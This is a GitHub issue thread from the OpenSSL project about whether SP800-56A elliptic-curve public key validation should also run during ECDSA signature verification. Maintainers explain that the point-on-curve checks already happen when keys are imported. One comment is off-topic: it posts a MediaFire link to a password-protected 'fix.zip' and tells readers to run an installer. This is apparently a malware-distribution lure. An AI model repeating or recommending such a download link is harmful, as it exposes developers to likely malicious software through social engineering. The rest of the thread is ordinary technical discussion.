### ISSUE TITLE
EC Public Key Validation SP800-56A on ECDSA procedures

### ISSUE THREAD

**Issue by RodriM11** [openssl/openssl#25301]
I was wondering whether the Public Key checks on EC points, established on SP800-56A r3 and codified in the ``` ossl_ec_key_private_check ``` procedure, should also be included within ECDSA procedures. For application-specific signature verifications, if the checks were desired, one could just add the  ```EVP_PKEY_public_check```. But, for TLS procedures, I think it could be interesting to have them within ECDSA processes, as I have not find another way of injecting that security check in the validation path of the TLS certificates and signatures.
I think it would make sense to introduce that check on the ```ossl_ecdsa_simple_verify_sig``` procedure, but I am aware of the increased cost that those checks would involve.

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by vdukhovni** [comment]
@t8m Any thoughts?

**Comment by t8m** [comment]
Actually all the checks required for the prime curves are already happening as part of importing the public key into the provider. The only thing missing is the full validation but that is AFAIK required only for cofactor ECDH.

IMO we should not add this implicitly to ECDSA.

**Comment by RodriM11** [comment]
Shouldn't some checks like the public key being an actual point in the curve (and other established in SP800-56A, Section 5.6.2.3) be also done over the signing public key, to avoid Invalid Curve Attacks and such? Or, if those checks are already in place, would you mind pointing me to where are they happening (I did a quick source code review + example execution and only found it for ECDH)

**Comment by t8m** [comment]
The check is being done when the EC_POINT coordinates are set internally.
 https://github.com/openssl/openssl/blob/6dacee485fad2c4d334e08af48891636205ddb6b/crypto/ec/ec_lib.c#L878

**Comment by t8m** [comment]
In ECDH the check is actually done twice, but it is not expensive so it is OK.

**Comment by RodriM11** [comment]
Many thanks! Yeah, I forgot that one is included (verification 3. in Section 5.6.2.3.4), but wouldn't (at least) verifications 1. and 2. (and IMO verification 4.) be also important in order to thwart invalid curves and their attacks, or is it unnecessary?

Thanks in advance!

**Comment by t8m** [comment]
IMO verification 1 and 2 are implicit in the way the public key is decoded as well. And I do not know what verification 4 are you talking about.

Also please note SP800-56A really does not apply to ECDSA but to key establishment.

**Comment by RodriM11** [comment]
Yeah, I'm aware of SP800-56A is declared within the scope of Key Establishment, but IMO those checks are interesting for ECC in general. 
Thanks again for the help! I will close this issue then.
